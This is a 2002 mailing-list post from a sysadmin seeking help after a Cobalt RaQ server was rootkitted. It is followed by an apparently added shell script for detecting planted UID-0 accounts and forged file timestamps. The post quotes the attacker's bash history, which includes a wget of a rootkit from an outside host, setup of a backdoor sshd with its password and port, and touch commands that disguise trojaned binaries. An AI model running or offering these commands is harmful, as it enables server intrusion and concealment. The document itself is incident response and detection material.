[cobalt-users] Root kit raq
- Subject: [cobalt-users] Root kit raq
- From: "Adam Knowles" <adam@xxxxxxxxxxxxxxx>
- Date: Mon Dec 16 17:43:04 2002
- List-id: Mailing list for users to share thoughts on Sun Cobalt products. <cobalt-users.list.cobalt.com>
Hi,
Wondering if anyone has time to help with a hacked RaQ? I'm not the most
experienced sysadmin, so hopefully this can be some good learning for
me, if anyone's willing to share! Apologies for the long email, but if
anyone can read it I'd appreciate it so much :)
It's a RaQ4i 512MB. It got hacked through the flawed SHP package Sun
shipped. I hadn't yet applied the SHP-remove package.
You'll see the extent of the break-in later, but the only actual symptom
is that mail sent using my server as SMTP never arrives. Local users' mail is
delivered OK. SMTP doesn't give errors; it accepts mail but doesn't
deliver it.
The hack happened Monday morning at 05.00. Someone got in and executed
the following, taken from BASH history (why didn't they clean this up?):
------------------------ START SNIP -----------------------------
{.{bash_history,nsr},b{in,oot},dev,etc,gmon.out,home,l{ib,ost+found},mnt
,nsr,opt,proc,root,s{bin,etup},tmp,usr,var$
hostname
cd /usr/sbin
mkdir tmp
cd tmp
pwd
wget http://www.tk-pttuntex.com/~zen/file/tutorial/rkid.tar.gz
tar -zxf rkid.tar.gz
cd rkid
./setup angina 35353
exit
------------------------ END SNIP -----------------------------
So they got into the system, then downloaded rkid.tar.gz. This is a
rootkit. I downloaded it myself and it calls itself "shkit-v4-internal
release 2002". Amongst other things, there are three files infected with a
couple of viruses: Linux.Lion.Worm and Trojan.Linux.Hacktop. I know this
since Norton told me when I downloaded rkid.tar.gz to my Windows PC.
Is there anything I can do about these viruses?
The kit installed a new sshd, running on port 35353 with the pass
'angina'.
I tried this:
/sbin/ipchains -A input -j DENY -p tcp -l -s 0.0.0.0/0 -d my.servers.ip.address/32 35353
I added the ipchains line to the bottom of rc.local to make sure it
carries over reboots.
That stopped telnet and SSH on port 35353 from working. Telnet's
normally disabled, but had mysteriously become enabled. I disabled it
again.
I've stopped access to the hacker's own SSH, and changed the password
for admin and root on my 'real' SSH. Is that enough to stop the
immediate threat? Or will they have access to my new passwords somehow?
I got the chkrootkit software to check other stuff.
Notable results:
[root chkrootkit-0.37]# ./chkrootkit
Checking `ifconfig'... INFECTED
Checking `login'... INFECTED
Searching for t0rn's v8 defaults... Possible t0rn v8 (or variation)
rootkit installed
Searching for Showtee... Warning: Possible Showtee Rootkit installed
I installed Portsentry 2. Do I need to add that to my rc.local to make
sure it starts up on reboot?
Found in /etc/passwd & /etc/shadow:
sbin:x:0:0::/sbin/services:/bin/bash
Seemed to be a user called 'sbin' with root privileges? Got rid of it.
Should I have done this another way with 'userdel' or something? Do I
need to restart anything for these changes to be noticed?
System logs aren't being generated. How can I sort that? Syslogd reports
it's already running.
The kit added these lines to rc.sysinit. I removed them, but what did
they do?
# Xntps (NTPv3 daemon) startup..
/usr/sbin/xntps -q
And finally..here's all the files the kit backdoor'd:
------------- START SNIP ----------------
# time change bitch
touch -acmr /sbin/ifconfig ifconfig
touch -acmr /bin/ps ps
touch -acmr /bin/ls ls
touch -acmr /bin/login login
touch -acmr /bin/netstat netstat
touch -acmr /usr/bin/find find
touch -acmr /usr/bin/top top
touch -acmr /usr/sbin/lsof lsof
touch -acmr /sbin/syslogd syslogd
touch -acmr /usr/bin/slocate slocate
touch -acmr /usr/bin/dir dir
touch -acmr /usr/bin/md5sum md5sum
touch -acmr /usr/bin/pstree pstree
echo ${RED} baga mare PuiDeDraC jajajaj !!! PuiDeDraC Iz Hackerz!!!
------------- END SNIP --------------------
It looks like the damage is pretty serious. I've taken an SQL backup of
the MySQL databases on the server, plus tarballed up the /home/sites
directory. If I clean the latter with Norton, order a rebuild from my
datacentre, then upload everything back, is that the best way forward?
And did this really all happen just because I didn't apply the
SHP-remove package from Sun in time?
Thanks!!
---
Adam Knowles
Freelance Developer
AC Design
Email: adam@xxxxxxxxxxxxxxx
Disclaimer:
Please notify adam@xxxxxxxxxxxxxxx if you receive
this message in error.
This email is sent in confidence and should only be
read by the intended recipient(s). Distribution or use
of the above information by others is prohibited.
Adam Knowles accepts no responsibility
for damage caused by viruses passed.
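Two checks that follow directly from the post above, as an added example that is not part of the original message or of the rootkit's own scripts. The first finds extra UID-0 accounts in a passwd-format file (the 'sbin:x:0:0:...' entry the poster found). The second exploits a weakness in the kit's "time change" step: `touch -acmr` copies the atime and mtime of the original binary onto the trojan, but user space cannot set ctime, so a freshly dropped replacement keeps a fresh ctime that disagrees with its cloned mtime. The directory layout, file names, and passwd lines below are constructed for the demo, and the check assumes GNU `stat`/`touch` (the `-c` and `-d` options).

```shell
#!/bin/sh
# Added example, not from the original post. Assumes GNU coreutils (stat -c, touch -d).

# Print usernames with UID 0 other than root from a passwd-format file ($1).
find_uid0_accounts() {
  awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print regular files in directory $1 whose ctime is more than $2 seconds
# (default 5) newer than their mtime. touch -acmr clones atime/mtime from a
# reference file but cannot touch ctime, so a cloned trojan shows up here.
find_cloned_timestamps() {
  dir=$1
  slack=${2:-5}
  for f in "$dir"/*; do
    [ -f "$f" ] || continue
    set -- $(stat -c '%Y %Z' "$f")   # mtime ctime (epoch seconds)
    mtime=$1
    ctime=$2
    if [ $((ctime - mtime)) -gt "$slack" ]; then
      printf '%s\n' "$f"
    fi
  done
}

# Build a constructed sandbox mirroring the post: a backdoor UID-0 user,
# a trojaned "ifconfig" whose mtime was cloned from an old original, and
# a clean "ps" written normally.
demo() {
  work=$(mktemp -d)
  mkdir "$work/bin"
  cat > "$work/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
admin:x:500:500::/home/admin:/bin/bash
sbin:x:0:0::/sbin/services:/bin/bash
EOF
  printf 'original binary\n' > "$work/orig_ifconfig"
  touch -d '2001-01-01 00:00:00' "$work/orig_ifconfig"      # old, like a real /sbin/ifconfig
  printf 'trojan binary\n' > "$work/bin/ifconfig"
  touch -acmr "$work/orig_ifconfig" "$work/bin/ifconfig"    # the kit's "time change" step
  printf 'clean binary\n' > "$work/bin/ps"

  echo "UID 0 accounts other than root:"
  find_uid0_accounts "$work/passwd"
  echo "Files whose ctime is newer than their cloned mtime:"
  find_cloned_timestamps "$work/bin"
  rm -rf "$work"
}

demo
```

On a real host you would run `find_cloned_timestamps` against /bin, /sbin, /usr/bin and /usr/sbin and compare the hits with the list in the kit's setup script; it is a triage aid, not a verdict, since a legitimate package upgrade that preserves mtimes produces the same ctime/mtime gap, and a kit that replaces binaries via `dd` over the original inode or that patches the kernel would not be caught this way.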